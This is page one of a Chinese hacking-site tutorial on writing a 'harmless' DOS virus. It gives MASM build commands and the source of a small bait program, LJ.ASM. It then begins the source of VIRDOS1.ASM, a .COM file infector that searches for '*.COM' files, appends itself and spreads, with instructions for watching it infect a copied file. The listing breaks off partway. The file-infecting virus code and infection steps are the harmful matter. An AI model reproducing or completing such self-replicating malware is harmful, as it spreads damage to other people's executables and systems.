简单无害的DOS病毒编写

• ===========BEGIN OF LJ.ASM============
  请在DOS下用MASM 5.O编译,然后用LINK.EXE连接.最后用EXE2BIN连接成.COM文件,格式如下:
  C:\>MASM LJ.ASM 生成.OBJ文件及.LST文件
  C:\>LINK LJ.OBJ 生成.EXE文件
  C:\>EXE2BIN LJ.EXE LJ.COM
  即生成LJ.COM文件,然后即可直接运行,该程序无任何目的,只用于被搜索感染调试用,可直接运行,格式如下:
  C:>LJ
  　　　　　　　　　　　　　　　　　　　　　　　　 .19.
  原程序如下:
  SEG_A　　　　 SEGMENT　　 BYTE PUBLIC
  　　　 ASSUME　　 CS:SEG_A, DS:SEG_A
  　　　 ORG　　 100H
  LJJ2　　　　 PROC　　 FAR
  START:
  　 JMP REAL_START
  REAL_START:
  　 NOP
  　　　 NOP
  　　　 NOP
  　　　 MOV　　 AH,4CH
  　 INT 21H　　
  LJJ2　　　　 ENDP
  SEG_A　　　　 ENDS
  　　　 end　　 start
  
  
  =============BEGIN OF VIRDOS1.ASM============（．ＣＯＭ文件病毒）
  (1)请在DOS下用MASM 5.O编译,然后用LINK.EXE连接.最后用EXE2BIN连接成.COM文件,格式如下:
  C:\>MASM VIRDOS1.ASM 生成.OBJ文件及.LST文件
  C:\>LINK VIRDOS1.OBJ 生成.EXE文件
  C:\>EXE2BIN VIRDOS1.EXE VIRDOS1.COM
  即生成VIRDOS1.COM文件,然后即可运行,先看一个调试程序LJ.COM的字节数(如10个字节长度) 运行格式如下:
  C:>VIRDOS1 LJ.COM
  在DOS下运行上述命令后即可看到LJ.COM文件字节变长,这就是LJ.COM被病毒VIRDOS1.COM第一次感染后的结果.我们可以用COPY命令复制一个同LJ.COM(如10个字节长度)原程序一样的程序(未被病毒感染的程序),叫LJ1.COM吧!
  被病毒感染的LJ.COM在DOS下运行的格式:
  C:>LJ.COM
  运行过后我们再查看LJ1.COM文件长度是否变长了,是的话即LJ1.COM也被病毒感染了.
  
  ;本程序调试请使用TR或DEBUG
  GoHead MACRO
  MOV AX,4200H　　　　　 ;移动文件指针至文件头　
  XOR CX,CX
  XOR DX,DX
  INT 21H
  ENDM
  GoTail MACRO　　　
  MOV AX,4202H　　　　　 ;移动文件指针至文件尾　
  XOR CX,CX
  XOR DX,DX
  INT 21H
  ENDM
  CODE SEGMENT
  ORG 100H
  ASSUME CS:CODE;DS:CODE
  START: JMP INIZ　　　 ;无条件转到INIZ(目的执行病毒释放程序)
  BEGIN:
  JMP　 START1　　　　　 ;执行病毒第一条指令
  FN DB '*.COM',0　　　 ;用于搜索所有.COM文件的伪定义
  
  COM_SH_LEN DW 0000H　　　 ;用于目的文件长度的伪定义(因为病毒加载目的文件时要
  
• [1] [2] [3] [4] [5] [6] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 简单无害的DOS病毒编写 相关文章：
• 简单无害的DOS病毒编写 相关软件

上一篇:邪恶八进制内部隐藏工具NOFILE

下一篇:Win下的Apache+PHP+MySql+虚拟主机设置全功略

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐